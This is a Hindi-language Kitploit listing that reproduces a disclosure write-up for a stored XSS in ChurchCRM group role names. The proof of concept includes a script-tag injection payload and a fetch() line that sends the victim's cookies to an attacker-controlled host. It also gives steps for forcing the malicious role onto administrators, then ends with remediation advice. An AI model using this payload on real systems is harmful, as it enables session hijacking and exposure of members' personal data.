Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-67876 — CVE-2025-67876 का विस्तृत proof-of-concept जो ChurchCRM ग्रुप रोल नामों में stored XSS दिखाता है, जो एडमिन सत्र अपहरण का कारण बनता है, पूर्ण शोषण वॉकथ्रू और सुधार अनुशंसाओं के साथ। | Kitploit
उपकरण/GitHubGitHub/lukasz-rybak/cve-2025-67876
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगपेपर और शोधलर्निंग और शिक्षा
GitHublukasz-rybak/cve-2025-67876

CVE-2025-67876

CVE-2025-67876 का विस्तृत proof-of-concept जो ChurchCRM ग्रुप रोल नामों में stored XSS दिखाता है, जो एडमिन सत्र अपहरण का कारण बनता है, पूर्ण शोषण वॉकथ्रू और सुधार अनुशंसाओं के साथ।

रिपॉजिटरी देखें
25 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2025-67876: ChurchCRM में ग्रुप रोल नाम में स्टोर्ड XSS जो एडमिन सेशन हाइजैकिंग की ओर ले जाता है

अवलोकन

फ़ील्डविवरण
CVE IDCVE-2025-67876
गंभीरताCRITICAL
सलाहसलाह देखें
खोजकर्ताLukasz Rybak

प्रभावित उत्पाद

  • ChurchCRM/CRM

विवरण

सारांश

ChurchCRM में एक संग्रहीत क्रॉस-साइट स्क्रिप्टिंग (XSS) कमजोरी मौजूद है जो 'Manage Groups' अनुमति वाले निम्न-विशेषाधिकार उपयोगकर्ता को समूह भूमिका नामों में लगातार जावास्क्रिप्ट इंजेक्ट करने की अनुमति देती है। पेलोड डेटाबेस में सहेजा जाता है और जब भी कोई उपयोगकर्ता (प्रशासकों सहित) उस भूमिका को प्रदर्शित करने वाला पृष्ठ देखता है, जैसे GroupView.php या PersonView.php, तो निष्पादित होता है। इससे पूर्ण सत्र अपहरण और खाता अधिग्रहण संभव होता है।

विवरण

मूल कारण समूह भूमिका नामों के प्रबंधन में इनपुट वैलिडेशन और आउटपुट एन्कोडिंग की कमी है।

जब GroupEditor.php में किसी समूह को संपादित किया जाता है, तो उपयोगकर्ता भूमिका नामों को संशोधित कर सकता है। एप्लिकेशन इनपुट को स्वच्छ नहीं करता (जैसे, कोई strip_tags, htmlspecialchars, या सर्वर-साइड वैलिडेशन नहीं)। मान list_lst डेटाबेस तालिका में संग्रहीत किया जाता है।

बाद में, संग्रहीत मान बिना एस्केपिंग के सीधे HTML में इंजेक्ट किया जाता है:

  • GroupView.php में, समूह भूमिकाएँ में लिपटी तालिका कोशिकाओं के अंदर दिखाई देती हैं।
  • PersonView.php में, उपयोगकर्ता को असाइन की गई भूमिकाएँ “Assigned Groups” के अंतर्गत प्रदर्शित होती हैं। चूंकि कोई एस्केपिंग लागू नहीं की जाती, भूमिका नाम में संग्रहीत कोई भी HTML या जावास्क्रिप्ट पीड़ित के ब्राउज़र में निष्पादित होता है।

इस प्रकार, निम्न-विशेषाधिकार वाला उपयोगकर्ता (Manage Groups के साथ) एक भूमिका में जावास्क्रिप्ट इंजेक्ट करके और उस भूमिका को किसी प्रशासक को असाइन करके विशेषाधिकारों को पूर्ण प्रशासक तक बढ़ा सकता है।

PoC

चरण 1 - हमलावर सेटअप

हमलावर-नियंत्रित मशीन पर x.js बनाएं:

fetch('http://172.20.0.1:8000/log?cookie=' + encodeURIComponent(document.cookie));

फ़ाइल को सर्व करें:

python3 -m http.server 800

चरण 2 - XSS पेलोड इंजेक्ट करें

  1. Manage Groups अनुमति वाले उपयोगकर्ता के रूप में लॉग इन करें।

    चित्र
  2. यहाँ जाएं: Groups → List Groups → कोई भी समूह चुनें → Settings.

  3. “Group Roles” अनुभाग में, किसी मौजूदा भूमिका को संपादित करें या नई बनाएं।

  4. दुर्भावनापूर्ण पेलोड डालें:

"><script src=//172.20.0.1:800/x.js></script>

चित्र

Group Roles सूची में, अपने इंजेक्ट किए गए XSS पेलोड वाली भूमिका के आगे Default पर क्लिक करें। यह सुनिश्चित करता है कि समूह में जोड़े गए किसी भी उपयोगकर्ता को स्वचालित रूप से दुर्भावनापूर्ण भूमिका असाइन हो जाएगी, जिससे संभावना बढ़ जाती है कि कोई प्रशासक अपनी प्रोफ़ाइल देखते समय XSS को ट्रिगर करेगा। चित्र पिछली डिफ़ॉल्ट भूमिका, सामान्यतः "Member", के आगे Delete पर क्लिक करें। स्वच्छ डिफ़ॉल्ट भूमिका को हटाने से सिस्टम को सभी भविष्य के असाइनमेंट के लिए XSS-इंजेक्टेड भूमिका का उपयोग करने के लिए मजबूर करता है, जिससे पीड़ित द्वारा अपनी असाइन की गई भूमिका प्रदर्शित करने वाले किसी भी पृष्ठ को देखने पर निष्पादन की गारंटी होती है। चित्र

  1. भूमिका का नाम सहेजें। चित्र

चरण 3 - पीड़ित को दुर्भावनापूर्ण भूमिका असाइन करें

  1. Group View पृष्ठ पर जाएं।

  2. किसी भी उपयोगकर्ता को समूह सदस्य के रूप में जोड़ें (जैसे, Church Admin)।

    चित्र
  3. ड्रॉपडाउन से दुर्भावनापूर्ण भूमिका चुनें।

  4. असाइनमेंट सहेजें।

    चित्र

चरण 4 - XSS का निष्पादन

जब पीड़ित (प्रशासक) निम्नलिखित पर जाता है:

  • अपनी उपयोगकर्ता प्रोफ़ाइल: PersonView.php
  • समूह दृश्य पृष्ठ: GroupView.php

संग्रहीत जावास्क्रिप्ट तुरंत निष्पादित होती है। चित्र

हमलावर सर्वर पर, आने वाले अनुरोध दिखाई देंगे: चित्र

चित्र

यह सफल खाता अधिग्रहण की पुष्टि करता है।

प्रभाव

  • संग्रहीत XSS
  • पूर्ण प्रशासक सत्र अपहरण
  • निम्न-अनुमति उपयोगकर्ता से पूर्ण सिस्टम प्रशासक तक विशेषाधिकार वृद्धि
  • ChurchCRM में संग्रहीत सभी संवेदनशील व्यक्तिगत डेटा का जोखिम

CWE

CWE-79: वेब पेज जनरेशन के दौरान इनपुट का अनुचित उदासीनीकरण ('क्रॉस-साइट स्क्रिप्टिंग')

अनुशंसा

  • सभी भूमिका नाम प्रस्तुतियों के लिए आउटपुट एन्कोडिंग (htmlspecialchars) लागू करें।
  • सर्वर-साइड पर भूमिका नामों को मान्य करें और स्वच्छ करें।
  • समान कमजोरियों के लिए अन्य सूची-आधारित संपादन योग्य फ़ील्ड की समीक्षा करें।
  • केंद्रीय एस्केपिंग लाइब्रेरी या टेम्पलेटिंग इंजन के उपयोग पर विचार करें।

संदर्भ

  • https://github.com/ChurchCRM/CRM/security/advisories/GHSA-j9gv-26c7-3qrh

अस्वीकरण

इस CVE को समन्वित भेद्यता प्रकटीकरण प्रथाओं का पालन करते हुए जिम्मेदारी से प्रकट किया गया था। यहां दी गई जानकारी केवल शैक्षिक और रक्षात्मक उद्देश्यों के लिए है।

टूल डाउनलोड करें